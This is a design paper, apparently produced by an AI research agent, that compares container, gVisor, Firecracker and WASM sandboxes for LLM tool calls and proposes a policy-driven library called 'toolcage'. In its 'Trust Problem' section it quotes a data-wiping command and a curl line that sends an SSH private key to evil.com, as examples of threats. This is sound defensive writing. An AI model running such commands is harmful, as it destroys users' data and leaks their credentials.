Sandboxed Tool Execution for Open Models
Author: Roman “Romanov” Research-Rachmaninov, #B4mad Industries
Date: 2026-02-19
Bead: beads-hub-42d
Abstract
Tool use is emerging as the critical capability gap between proprietary and open-source language models. Sebastian Raschka (Lex Fridman #490) identifies it as “the huge unlock” but flags trust as the barrier: unconstrained tool execution on a user’s machine risks data destruction, exfiltration, and privilege escalation. This paper evaluates four sandboxing technologies – OCI containers, gVisor, Firecracker microVMs, and WebAssembly (WASM) – for isolating LLM-initiated tool calls. We propose a security-scoped tool execution layer that #B4mad can extract from OpenClaw as a standalone library, enabling any local open model to safely invoke tools.
Context: Why This Matters for #B4mad
OpenClaw already implements sandboxed execution: sub-agents run shell commands, edit files, and control browsers within a managed environment with policy-based access control. This capability is baked into the platform but not extractable. Meanwhile, the open-model ecosystem (Qwen, Llama, Mistral) is rapidly gaining function-calling abilities but lacks a standardized, secure execution runtime. There is a clear product opportunity: a lightweight, embeddable sandbox library that any inference framework (llama.cpp, vLLM, Ollama) can use to safely execute tool calls.
The Trust Problem
When an LLM generates a tool call like exec("rm -rf /") or curl https://evil.com/exfil --data @~/.ssh/id_rsa, the runtime must enforce:
- Filesystem isolation – restrict reads/writes to a scoped directory
- Network policy – block or allowlist outbound connections
- Syscall filtering – prevent privilege escalation, raw device access
- Resource limits – CPU, memory, time caps to prevent DoS
- Capability scoping – per-tool permission grants (this tool may read files but not write; that tool may make HTTP requests but only to api.example.com)
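These requirements reduce to a deny-by-default capability check: an action is refused unless it matches an explicit grant. A minimal Python sketch of that check (names and structure are illustrative, not an existing toolcage API):

```python
from dataclasses import dataclass, field

# Illustrative sketch only -- not a real toolcage API.
@dataclass
class Capability:
    read_paths: list[str] = field(default_factory=list)   # readable path prefixes
    write_paths: list[str] = field(default_factory=list)  # writable path prefixes
    net_hosts: list[str] = field(default_factory=list)    # allowlisted host:port pairs

def allowed(cap: Capability, action: str, target: str) -> bool:
    """Deny-by-default: an action passes only on an explicit grant."""
    if action == "connect":
        return target in cap.net_hosts
    if action == "read":
        grants = cap.read_paths + cap.write_paths  # writable implies readable
    elif action == "write":
        grants = cap.write_paths
    else:
        return False  # unknown actions are denied outright
    return any(target.startswith(g) for g in grants)

web_fetch = Capability(net_hosts=["api.example.com:443"])
print(allowed(web_fetch, "connect", "api.example.com:443"))  # True
print(allowed(web_fetch, "connect", "evil.com:443"))         # False
print(allowed(web_fetch, "write", "/etc/passwd"))            # False
```

The important property is the default branch: anything not explicitly granted, including actions the policy author never anticipated, is denied.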
Technology Evaluation
1. OCI Containers (Docker, Podman)
How it works: Tool calls execute inside a container with a minimal filesystem, dropped capabilities, seccomp profiles, and network namespaces.
| Aspect | Assessment |
|---|---|
| Startup latency | 200–500ms (cold), <100ms (warm with pool) |
| Isolation strength | Good – namespace + cgroup + seccomp. Not a security boundary by default, but hardened configs (rootless, no-new-privileges, read-only rootfs) are strong |
| Ecosystem maturity | Excellent – universal tooling, broad adoption |
| Filesystem scoping | Bind-mount specific directories read-only or read-write |
| Network control | --network=none or custom network policies |
| Overhead | Low – shared kernel, minimal memory overhead |
Verdict: Best default choice. Lowest friction, most mature, sufficient isolation for the threat model (untrusted LLM output, not adversarial kernel exploits).
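As a concrete illustration of the hardened configuration above, the sketch below assembles a `podman run` command line from documented hardening flags (`--network=none`, `--read-only`, `--cap-drop=ALL`, `--security-opt=no-new-privileges`; `--timeout` requires a reasonably recent Podman). The function name and defaults are hypothetical:

```python
def hardened_cmd(image, argv, workdir=None, memory="128m", timeout_s=30):
    """Build a hardened `podman run` command line for one tool call.

    Illustrative sketch: flags follow Podman's documented hardening
    options; exact availability varies by Podman version.
    """
    cmd = [
        "podman", "run", "--rm",
        "--network=none",                    # no outbound network at all
        "--read-only",                       # immutable root filesystem
        "--cap-drop=ALL",                    # drop every Linux capability
        "--security-opt=no-new-privileges",  # block setuid escalation
        f"--memory={memory}",                # hard memory cap
        "--pids-limit=64",                   # bound fork bombs
        f"--timeout={timeout_s}",            # kill the container after the cap
    ]
    if workdir:
        # Only the scoped working directory is writable inside the sandbox.
        cmd.append(f"--volume={workdir}:/workspace:rw")
    return cmd + [image] + list(argv)

print(" ".join(hardened_cmd("alpine:3.19", ["python3", "tool.py"], workdir="/tmp/job")))
```

A warm container pool would reuse these settings with a pre-created container rather than paying the cold-start cost per call.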
2. gVisor (runsc)
How it works: A user-space kernel that intercepts syscalls, providing an additional isolation layer on top of OCI containers. Used by Google Cloud Run.
| Aspect | Assessment |
|---|---|
| Startup latency | 300–800ms |
| Isolation strength | Excellent – syscall interception means container escapes require defeating both gVisor and the host kernel |
| Ecosystem maturity | Good – drop-in OCI runtime replacement |
| Compatibility | ~90% of Linux syscalls; some edge cases (io_uring, certain ioctls) fail |
| Performance | 5–30% overhead on I/O-heavy workloads due to syscall interposition |
Verdict: Strong choice when higher isolation is needed (e.g., executing code generated by untrusted models). The OCI compatibility means it’s a runtime swap, not an architecture change.
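The runtime-swap claim is literal: per the gVisor documentation, registering runsc with Docker is a one-line daemon configuration change, after which the same image runs under gVisor via `docker run --runtime=runsc`. A typical `/etc/docker/daemon.json` (runsc path may differ per installation):

```json
{
  "runtimes": {
    "runsc": {
      "path": "/usr/local/bin/runsc"
    }
  }
}
```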
3. Firecracker microVMs
How it works: Lightweight VMs with a minimal VMM (Virtual Machine Monitor), booting a stripped Linux kernel in ~125ms. Used by AWS Lambda and Fly.io.
| Aspect | Assessment |
|---|---|
| Startup latency | 125–200ms (impressive for a full VM) |
| Isolation strength | Maximum – hardware virtualization boundary (KVM). Separate kernel instance |
| Resource overhead | ~5MB memory for the VMM; guest kernel adds ~20–40MB |
| Ecosystem maturity | Moderate – requires KVM, custom rootfs images, API-driven lifecycle |
| Complexity | High – snapshot/restore helps latency but adds operational complexity |
Verdict: Overkill for most tool calls but appropriate for high-risk operations (arbitrary code execution, untrusted plugins). The snapshot/restore pattern could pre-warm VMs for sub-100ms cold starts.
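For a sense of the operational surface: Firecracker can boot from a single JSON file passed via `--config-file`. The minimal shape below follows the project's getting-started guide, though field names should be checked against the installed release:

```json
{
  "boot-source": {
    "kernel_image_path": "vmlinux",
    "boot_args": "console=ttyS0 reboot=k panic=1"
  },
  "machine-config": {
    "vcpu_count": 1,
    "mem_size_mib": 128
  }
}
```

Even this minimal setup requires supplying a guest kernel and rootfs image, which is the main source of the "high complexity" assessment above.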
4. WebAssembly (WASM) Sandboxes
How it works: Tool implementations compiled to WASM run in a sandboxed runtime (Wasmtime, WasmEdge) with capability-based security (WASI).
| Aspect | Assessment |
|---|---|
| Startup latency | <1ms (near-instant) |
| Isolation strength | Very good – linear memory model, no raw syscalls, capability-based I/O |
| Ecosystem maturity | Growing but incomplete – WASI preview 2 still stabilizing; not all tools can be compiled to WASM |
| Language support | Rust, C/C++, Go (via TinyGo), Python (via componentize-py, limited) |
| Limitation | Cannot run arbitrary shell commands; tools must be purpose-built as WASM components |
Verdict: Ideal for a curated tool catalog (file operations, HTTP clients, parsers) but cannot sandbox arbitrary shell execution. Complementary to container-based approaches.
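WASI's capability model maps naturally onto per-tool policies: a directory is only visible to the module if it is explicitly preopened. A sketch (hypothetical function name) that translates a policy into a `wasmtime run` invocation using the documented `--dir` and `--env` flags:

```python
def wasm_cmd(module, preopen_dirs=(), env=None):
    """Build a `wasmtime run` command line where the only I/O the tool
    can perform goes through explicitly preopened directories.

    Illustrative sketch; flag syntax per the Wasmtime CLI docs.
    """
    cmd = ["wasmtime", "run"]
    for d in preopen_dirs:
        cmd.append(f"--dir={d}")      # preopen: grants access to this subtree only
    for k, v in (env or {}).items():
        cmd.append(f"--env={k}={v}")  # pass only the variables the policy names
    cmd.append(module)
    return cmd

print(" ".join(wasm_cmd("file_edit.wasm", preopen_dirs=["/workspace/project"])))
```

Unlike the container backends, there is nothing to subtract here: a module with no preopens and no sockets simply has no way to express filesystem or network access.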
Proposed Architecture: toolcage
We propose a library called toolcage (working name) with the following design:
┌─────────────────────────────────────────┐
│            Inference Runtime            │
│       (Ollama / vLLM / llama.cpp)       │
│                                         │
│     Model generates: tool_call(...)     │
│             │                           │
│             ▼                           │
│      ┌─────────────┐                    │
│      │  toolcage   │ ← policy engine    │
│      │  library    │ ← sandbox manager  │
│      └──────┬──────┘                    │
│             │                           │
└─────────────┼───────────────────────────┘
              │
              ▼
   ┌─────────────────────┐
   │   Sandbox Backend   │
   │  ┌───┐ ┌───┐ ┌───┐  │
   │  │OCI│ │gVi│ │WAS│  │
   │  │   │ │sor│ │M  │  │
   │  └───┘ └───┘ └───┘  │
   └─────────────────────┘
Core Concepts
- Tool Registry – each tool declares its capabilities: filesystem paths, network endpoints, max execution time, required syscalls
- Policy Engine – a TOML/YAML policy file maps tools to allowed capabilities, similar to OpenClaw’s existing tool policies
- Sandbox Backend – pluggable: OCI (default), gVisor (hardened), Firecracker (maximum), WASM (for built-in tools)
- Result Extraction – structured output capture (stdout/stderr/exit code/files) with size limits
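The Result Extraction concept can be sketched as a bounded capture wrapper. This is illustrative Python, not the proposed library's API; it assumes the command has already been wrapped by one of the sandbox backends:

```python
import subprocess
from dataclasses import dataclass

@dataclass
class ToolResult:
    """Structured result handed back to the model. Illustrative shape."""
    exit_code: int
    stdout: str
    stderr: str
    truncated: bool  # True if either stream exceeded the size cap

def run_capped(argv, timeout_s=30, max_bytes=64_000):
    """Run an (already sandboxed) command, capturing a bounded result.

    Size limits matter: a tool that prints gigabytes would otherwise
    blow out the model's context window and the host's memory.
    """
    proc = subprocess.run(argv, capture_output=True, timeout=timeout_s)
    out, err = proc.stdout, proc.stderr
    return ToolResult(
        exit_code=proc.returncode,
        stdout=out[:max_bytes].decode(errors="replace"),
        stderr=err[:max_bytes].decode(errors="replace"),
        truncated=len(out) > max_bytes or len(err) > max_bytes,
    )
```

Captured files would follow the same pattern: copy out of the sandbox only paths the policy names, subject to the same size caps.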
Example Policy
[tool.web_fetch]
backend = "oci"
network = ["allowlist:api.example.com:443"]
filesystem = "none"
timeout = "30s"
memory = "128MB"
[tool.code_execute]
backend = "gvisor"
network = "none"
filesystem = { writable = ["/workspace"], readable = ["/data"] }
timeout = "60s"
memory = "512MB"
[tool.file_edit]
backend = "wasm"
filesystem = { writable = ["/workspace/project"] }
network = "none"
timeout = "10s"
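The "lint policies" mitigation from the risk assessment can be made concrete against this policy shape. A minimal linter (Python sketch; assumes the TOML above has already been parsed into a dict, e.g. with the standard-library tomllib) enforcing deny-by-default and flagging missing limits:

```python
def lint_policy(policy: dict) -> list[str]:
    """Flag risky tool policies. Mirrors the example TOML: each tool name
    maps to a dict with 'network', 'filesystem', 'timeout', 'memory' keys.
    Illustrative sketch, not a finished rule set.
    """
    problems = []
    for name, rules in policy.items():
        # Network must be "none" or an explicit allowlist -- never open.
        net = rules.get("network", "none")
        entries = net if isinstance(net, list) else [net]
        if entries != ["none"] and not all(str(e).startswith("allowlist:") for e in entries):
            problems.append(f"{name}: network must be 'none' or an explicit allowlist")
        # Every tool needs a timeout, or execution is unbounded.
        if "timeout" not in rules:
            problems.append(f"{name}: no timeout set (unbounded execution)")
        # A writable grant on / defeats filesystem scoping entirely.
        fs = rules.get("filesystem", "none")
        writable = fs.get("writable", []) if isinstance(fs, dict) else []
        if fs == "/" or "/" in writable:
            problems.append(f"{name}: writable grant covers the filesystem root")
    return problems
```

Running such a linter at policy load time, before any tool call executes, turns misconfiguration from a silent exfiltration path into a startup error.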
Integration Points
- Ollama: Post-generation hook that intercepts tool calls before execution
- vLLM: Custom tool executor callback in the serving layer
- llama.cpp: Function call handler in the server mode
- OpenClaw: Replace the current exec subsystem with toolcage for consistency
Competitive Landscape
| Project | Approach | Gap |
|---|---|---|
| OpenAI Code Interpreter | Proprietary sandbox | Not available locally |
| E2B.dev | Cloud-hosted sandboxes | Requires network round-trip; not local-first |
| Modal | Serverless containers | Cloud-only; not embeddable |
| Daytona | Dev environment sandboxes | Full workspace, not per-tool-call scoped |
| toolcage (proposed) | Local, per-call, policy-scoped | Does not exist yet |
The key differentiator: toolcage would be the first local-first, embeddable, per-tool-call sandbox with declarative security policies.
Recommendations
Start with OCI + rootless Podman as the default backend. It’s available everywhere, well-understood, and sufficient for the primary threat model.
Implement the policy engine first – this is the real value. The sandbox backend is pluggable; the security model is the product.
Ship as a Go or Rust library with a CLI wrapper – embeddable in inference runtimes but also usable standalone (toolcage exec --policy tools.toml -- python script.py).
Contribute to the MCP (Model Context Protocol) ecosystem – Anthropic’s MCP is becoming the standard for tool definitions. A toolcage MCP server that wraps any tool in a sandbox would have immediate adoption.
Extract from OpenClaw incrementally – OpenClaw’s exec subsystem already solves this problem. Factor out the sandbox and policy layers as a library, then have OpenClaw depend on it.
Publish as open source – this positions #B4mad as a thought leader in secure local AI infrastructure, driving adoption toward the broader OpenClaw platform.
Risk Assessment
| Risk | Likelihood | Mitigation |
|---|---|---|
| Container escape via kernel exploit | Low | gVisor/Firecracker backends for high-risk tools |
| Policy misconfiguration allows exfiltration | Medium | Deny-by-default; require explicit allowlists; lint policies |
| Performance overhead kills UX | Medium | Container pooling; WASM for lightweight tools; warm caches |
| Ecosystem moves to cloud-only sandboxes | Low | Local-first is a strong counter-position for privacy-conscious users |
References
- Raschka, S. (2026). Interview on Lex Fridman Podcast #490, “AI State of the Art 2026.” ~32:54 timestamp discussing tool use and containerization.
- Google gVisor Project. https://gvisor.dev/
- AWS Firecracker. https://firecracker-microvm.github.io/
- WebAssembly System Interface (WASI). https://wasi.dev/
- Anthropic Model Context Protocol (MCP). https://modelcontextprotocol.io/
- E2B.dev β Open-source cloud sandboxes for AI. https://e2b.dev/
- Open Containers Initiative (OCI) Runtime Specification. https://opencontainers.org/
This paper was produced by Romanov (Research-Rachmaninov) for #B4mad Industries. Filed under bead beads-hub-42d.